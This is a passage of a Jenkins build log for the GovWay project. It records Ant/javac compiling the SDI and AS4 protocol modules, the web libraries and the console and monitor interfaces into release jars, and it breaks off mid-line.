compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/sdi/src/it/gov/fatturapa/sdi/ws/trasmissione/v1_0/types] 18:01:45 [WARNING] [javac] anomalous package-info.java path: package-info.java 18:01:45 [INFO] [javac] Compiling 22 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:47 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/sdi/openspcoop2_sdi-protocol-wstrasmissione-v10_RELEASE.jar 18:01:47 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:52 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:52 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:01:52 [WARNING] [echo] **************************************** 18:01:52 [WARNING] [echo] **** DEBUG MODE ON ***** 18:01:52 [WARNING] [echo] **************************************** 18:01:52 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:01:52 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/sdi/src/org/openspcoop2/protocol/sdi] 18:01:52 [INFO] [javac] Compiling 32 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:54 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/sdi/openspcoop2_sdi-protocol-plugin_RELEASE.jar 18:01:54 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:59 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:59 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:01:59 [WARNING] [echo] **************************************** 18:01:59 [WARNING] [echo] **** DEBUG MODE ON ***** 18:01:59 [WARNING] [echo] **************************************** 18:01:59 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:01:59 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/sdi/src] 18:01:59 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/sdi/openspcoop2_sdi-protocol-config_RELEASE.jar 18:01:59 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:02:02 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:02:02 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:02:02 [WARNING] [echo] **************************************** 18:02:02 [WARNING] [echo] **** DEBUG MODE ON ***** 18:02:02 [WARNING] [echo] **************************************** 18:02:02 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:02:02 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/sdi/openspcoop2_sdi-protocol-schemi_RELEASE.jar 18:02:05 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:02:05 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:02:05 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 18:02:05 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_sdi-protocol_RELEASE.jar 18:02:18 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:02:18 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:02:18 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:02:18 [WARNING] [echo] **************************************** 18:02:18 [WARNING] [echo] **** DEBUG MODE ON ***** 18:02:18 [WARNING] [echo] **************************************** 18:02:18 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/as4 18:02:18 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:02:18 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/as4/src/org/oasis_open/docs/ebxml_msg/ebms/v3_0/ns/core/_200704] 18:02:18 [WARNING] [javac] anomalous package-info.java path: package-info.java 18:02:18 [INFO] [javac] Compiling 52 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:02:19 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/as4/openspcoop2_as4-protocol-ebms-v3_0_RELEASE.jar 18:02:20 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:02:24 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:02:24 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:02:24 [WARNING] [echo] **************************************** 18:02:24 [WARNING] [echo] **** DEBUG MODE ON ***** 18:02:24 [WARNING] [echo] **************************************** 18:02:24 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:02:24 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/as4/src/backend/ecodex/org/_1_1] 18:02:24 [WARNING] [javac] anomalous package-info.java path: package-info.java 18:02:24 [INFO] [javac] Compiling 49 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:02:25 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 18:02:25 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/as4/openspcoop2_as4-protocol-backend-ecodex-v1_1_RELEASE.jar 18:02:25 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:02:29 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:02:29 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:02:29 [WARNING] [echo] **************************************** 18:02:29 [WARNING] [echo] **** DEBUG MODE ON ***** 18:02:29 [WARNING] [echo] **************************************** 18:02:29 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:02:29 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/as4/src/eu/domibus/configuration] 18:02:29 [WARNING] [javac] anomalous package-info.java path: package-info.java 18:02:29 [INFO] [javac] Compiling 112 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:02:31 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/as4/openspcoop2_as4-protocol-eu-domibus-configuration_RELEASE.jar 18:02:31 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:02:36 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:02:36 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:02:36 [WARNING] [echo] **************************************** 18:02:36 [WARNING] [echo] **** DEBUG MODE ON ***** 18:02:36 [WARNING] [echo] **************************************** 18:02:36 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:02:36 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/as4/src] 18:02:36 [INFO] [javac] Compiling 52 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:02:39 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/as4/openspcoop2_as4-protocol-plugin_RELEASE.jar 18:02:39 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:02:42 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:02:42 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:02:42 [WARNING] [echo] **************************************** 18:02:42 [WARNING] [echo] **** DEBUG MODE ON ***** 18:02:42 [WARNING] [echo] **************************************** 18:02:42 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:02:42 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/as4/src] 18:02:42 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/as4/openspcoop2_as4-protocol-config_RELEASE.jar 18:02:42 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:02:44 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:02:44 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:02:44 [WARNING] [echo] **************************************** 18:02:44 [WARNING] [echo] **** DEBUG MODE ON ***** 18:02:44 [WARNING] [echo] **************************************** 18:02:44 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:02:44 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/as4/openspcoop2_as4-protocol-schemi_RELEASE.jar 18:02:47 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:02:47 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:02:47 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 18:02:47 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_as4-protocol_RELEASE.jar 18:02:52 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/users 18:02:55 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/users/compile-jar-openspcoop2 18:02:55 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:02:55 [WARNING] [echo] **************************************** 18:02:55 [WARNING] [echo] **** DEBUG MODE ON ***** 18:02:55 [WARNING] [echo] **************************************** 18:02:55 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:02:55 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/web_interfaces/lib/users/src] 18:02:55 [INFO] [javac] Compiling 13 source files to /var/lib/jenkins/workspace/GovWay/build/users/compile-jar-openspcoop2 18:02:56 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_web-lib-users_RELEASE.jar 18:02:56 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/users/compile-jar-openspcoop2 18:03:01 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/mvc 18:03:04 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/users/compile-jar-openspcoop2 18:03:04 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:03:04 [WARNING] [echo] **************************************** 18:03:04 [WARNING] [echo] **** DEBUG MODE ON ***** 18:03:04 [WARNING] [echo] **************************************** 18:03:04 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:03:04 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/web_interfaces/lib/users/src] 18:03:04 [INFO] [javac] Compiling 13 source files to /var/lib/jenkins/workspace/GovWay/build/users/compile-jar-openspcoop2 18:03:05 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_web-lib-users_RELEASE.jar 18:03:05 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/users/compile-jar-openspcoop2 18:03:11 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/mvc/compile-jar-openspcoop2 18:03:11 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:03:11 [WARNING] [echo] **************************************** 18:03:11 [WARNING] [echo] **** DEBUG MODE ON ***** 18:03:11 [WARNING] [echo] **************************************** 18:03:11 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/web-lib-mvc 18:03:11 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:03:11 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/web_interfaces/lib/mvc/src] 18:03:11 [INFO] [javac] Compiling 46 source files to /var/lib/jenkins/workspace/GovWay/build/mvc/compile-jar-openspcoop2 18:03:12 warning: Implicitly compiled files were not subject to annotation processing. 18:03:12 Use -implicit to specify a policy for implicit compilation. 18:03:12 1 warning 18:03:12 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/web-lib-mvc/openspcoop2_web-lib-mvc-core_RELEASE.jar 18:03:12 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/mvc/compile-jar-openspcoop2 18:03:14 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/mvc/compile-jar-openspcoop2 18:03:14 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:03:14 [WARNING] [echo] **************************************** 18:03:14 [WARNING] [echo] **** DEBUG MODE ON ***** 18:03:14 [WARNING] [echo] **************************************** 18:03:14 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:03:14 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/web_interfaces/lib/mvc/src/org/openspcoop2/web/lib/mvc/properties] 18:03:14 [INFO] [javac] Compiling 12 source files to /var/lib/jenkins/workspace/GovWay/build/mvc/compile-jar-openspcoop2 18:03:15 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/web-lib-mvc/openspcoop2_web-lib-mvc-properties_RELEASE.jar 18:03:15 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/mvc/compile-jar-openspcoop2 18:03:18 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:03:18 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:03:18 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 18:03:18 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_web-lib-mvc_RELEASE.jar 18:03:23 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/audit 18:03:27 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/users/compile-jar-openspcoop2 18:03:27 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:03:27 [WARNING] [echo] **************************************** 18:03:27 [WARNING] [echo] **** DEBUG MODE ON ***** 18:03:27 [WARNING] [echo] **************************************** 18:03:27 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:03:27 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/web_interfaces/lib/users/src] 18:03:27 [INFO] [javac] Compiling 13 source files to /var/lib/jenkins/workspace/GovWay/build/users/compile-jar-openspcoop2 18:03:29 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_web-lib-users_RELEASE.jar 18:03:29 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/users/compile-jar-openspcoop2 18:03:35 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/mvc/compile-jar-openspcoop2 18:03:35 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:03:35 [WARNING] [echo] **************************************** 18:03:35 [WARNING] [echo] **** DEBUG MODE ON ***** 18:03:35 [WARNING] [echo] **************************************** 18:03:35 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:03:35 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/web_interfaces/lib/mvc/src] 18:03:35 [INFO] [javac] Compiling 46 source files to /var/lib/jenkins/workspace/GovWay/build/mvc/compile-jar-openspcoop2 18:03:36 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/web-lib-mvc/openspcoop2_web-lib-mvc-core_RELEASE.jar 18:03:36 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/mvc/compile-jar-openspcoop2 18:03:39 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/mvc/compile-jar-openspcoop2 18:03:39 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:03:39 [WARNING] [echo] **************************************** 18:03:39 [WARNING] [echo] **** DEBUG MODE ON ***** 18:03:39 [WARNING] [echo] **************************************** 18:03:39 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:03:39 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/web_interfaces/lib/mvc/src/org/openspcoop2/web/lib/mvc/properties] 18:03:39 [INFO] [javac] Compiling 12 source files to /var/lib/jenkins/workspace/GovWay/build/mvc/compile-jar-openspcoop2 18:03:40 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/web-lib-mvc/openspcoop2_web-lib-mvc-properties_RELEASE.jar 18:03:40 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/mvc/compile-jar-openspcoop2 18:03:43 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:03:43 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:03:43 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 18:03:43 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_web-lib-mvc_RELEASE.jar 18:03:49 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/audit/compile-jar-openspcoop2 18:03:49 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:03:49 [WARNING] [echo] **************************************** 18:03:49 [WARNING] [echo] **** DEBUG MODE ON ***** 18:03:49 [WARNING] [echo] **************************************** 18:03:49 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/audit 18:03:49 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:03:49 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/web_interfaces/lib/audit/src/org/openspcoop2/web/lib/audit/costanti] 18:03:49 [INFO] [javac] Compiling 1 source file to /var/lib/jenkins/workspace/GovWay/build/audit/compile-jar-openspcoop2 18:03:50 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/audit/openspcoop2_web-lib-audit-costanti_RELEASE.jar 18:03:50 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/audit/compile-jar-openspcoop2 18:03:53 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/audit/compile-jar-openspcoop2 18:03:53 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:03:53 [WARNING] [echo] **************************************** 18:03:53 [WARNING] [echo] **** DEBUG MODE ON ***** 18:03:53 [WARNING] [echo] **************************************** 18:03:53 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:03:53 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/web_interfaces/lib/audit/src/org/openspcoop2/web/lib/audit/log] 18:03:53 [WARNING] [javac] anomalous package-info.java path: package-info.java 18:03:53 [INFO] [javac] Compiling 22 source files to /var/lib/jenkins/workspace/GovWay/build/audit/compile-jar-openspcoop2 18:03:53 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/audit/compile-jar-openspcoop2/constants/package-info.class 18:03:54 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/audit/openspcoop2_web-lib-audit-log_RELEASE.jar 18:03:54 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/audit/compile-jar-openspcoop2 18:03:57 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/audit/compile-jar-openspcoop2 18:03:57 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:03:57 [WARNING] [echo] **************************************** 18:03:57 [WARNING] [echo] **** DEBUG MODE ON ***** 18:03:57 [WARNING] [echo] **************************************** 18:03:57 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:03:57 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/web_interfaces/lib/audit/src/org/openspcoop2/web/lib/audit/dao] 18:03:57 [INFO] [javac] Compiling 4 source files to /var/lib/jenkins/workspace/GovWay/build/audit/compile-jar-openspcoop2 18:03:57 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/audit/openspcoop2_web-lib-audit-dao_RELEASE.jar 18:03:57 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/audit/compile-jar-openspcoop2 18:04:02 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/audit/compile-jar-openspcoop2 18:04:02 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:04:02 [WARNING] [echo] **************************************** 18:04:02 [WARNING] [echo] **** DEBUG MODE ON ***** 18:04:02 [WARNING] [echo] **************************************** 18:04:02 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:04:02 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/web_interfaces/lib/audit/src] 18:04:02 [INFO] [javac] Compiling 33 source files to /var/lib/jenkins/workspace/GovWay/build/audit/compile-jar-openspcoop2 18:04:03 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/audit/openspcoop2_web-lib-audit_RELEASE.jar 18:04:03 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/audit/compile-jar-openspcoop2 18:04:06 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:04:06 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:04:06 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 18:04:06 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_web-lib-audit_RELEASE.jar 18:04:16 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/govwayConsole 18:04:16 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/govwayConsole/compile-jar-openspcoop2 18:04:16 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:04:16 [WARNING] [echo] **************************************** 18:04:16 [WARNING] [echo] **** DEBUG MODE ON ***** 18:04:16 [WARNING] [echo] **************************************** 18:04:16 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:04:16 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/web_interfaces/control_station/src] 18:04:16 [INFO] [javac] Compiling 742 source files to /var/lib/jenkins/workspace/GovWay/build/govwayConsole/compile-jar-openspcoop2 18:04:34 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_web-govwayConsole_RELEASE.jar 18:04:35 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/govwayConsole/compile-jar-openspcoop2 18:04:43 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/tools/web_interfaces/monitor/src/src_core/META-INF/faces-config.xml 18:04:47 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/govwayMonitor 18:04:47 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:04:47 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:04:47 [WARNING] [echo] **************************************** 18:04:47 [WARNING] [echo] **** DEBUG MODE ON ***** 18:04:47 [WARNING] [echo] **************************************** 18:04:47 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/govwayMonitor-core 18:04:47 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:04:47 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/web_interfaces/monitor/src/src_core/] 18:04:47 [INFO] [javac] Compiling 161 source files to /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:04:50 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/govwayMonitor-core/openspcoop2_web-govwayMonitor-core_RELEASE.jar 18:04:50 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:04:54 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:04:54 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:04:54 [WARNING] [echo] **************************************** 18:04:54 [WARNING] [echo] **** DEBUG MODE ON ***** 18:04:54 [WARNING] [echo] **************************************** 18:04:54 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:04:54 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/web_interfaces/monitor/src/src_core/META-INF/resources] 18:04:54 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/govwayMonitor-core/openspcoop2_web-govwayMonitor-core-resources_RELEASE.jar 18:04:54 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:04:59 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:04:59 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:04:59 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 18:04:59 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_web-govwayMonitor-core_RELEASE.jar 18:05:10 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/tools/web_interfaces/monitor/src/src_transazioni/META-INF/faces-config.xml 18:05:16 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:05:16 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:05:16 [WARNING] [echo] **************************************** 18:05:16 [WARNING] [echo] **** DEBUG MODE ON ***** 18:05:16 [WARNING] [echo] **************************************** 18:05:16 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:05:17 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/web_interfaces/monitor/src/src_transazioni/] 18:05:17 [INFO] [javac] Compiling 89 source files to /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:05:21 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_web-govwayMonitor-transazioni_RELEASE.jar 18:05:21 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:05:28 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/tools/web_interfaces/monitor/src/src_stat/META-INF/faces-config.xml 18:05:33 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:05:33 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:05:33 [WARNING] [echo] **************************************** 18:05:33 [WARNING] [echo] **** DEBUG MODE ON ***** 18:05:33 [WARNING] [echo] **************************************** 18:05:33 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:05:33 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/web_interfaces/monitor/src/src_stat/] 18:05:34 [INFO] [javac] Compiling 63 source files to /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:05:37 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_web-govwayMonitor-statistiche_RELEASE.jar 18:05:37 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:05:44 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/tools/web_interfaces/monitor/src/src_eventi/META-INF/faces-config.xml 18:05:48 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:05:48 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:05:48 [WARNING] [echo] **************************************** 18:05:48 [WARNING] [echo] **** DEBUG MODE ON ***** 18:05:48 [WARNING] [echo] **************************************** 18:05:48 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:05:48 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/web_interfaces/monitor/src/src_eventi/] 18:05:48 [INFO] [javac] Compiling 7 source files to /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:05:49 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_web-govwayMonitor-eventi_RELEASE.jar 18:05:49 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:05:54 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/tools/web_interfaces/monitor/src/src_allarmi/META-INF/faces-config.xml 18:05:58 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:05:58 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:05:58 [WARNING] [echo] **************************************** 18:05:58 [WARNING] [echo] **** DEBUG MODE ON ***** 18:05:58 [WARNING] [echo] **************************************** 18:05:58 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:05:58 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/web_interfaces/monitor/src/src_allarmi/] 18:05:58 [INFO] [javac] Compiling 12 source files to /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:05:59 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_web-govwayMonitor-allarmi_RELEASE.jar 18:05:59 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:06:10 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/govwayConfig 18:06:10 [INFO] [mkdir] Created dir: 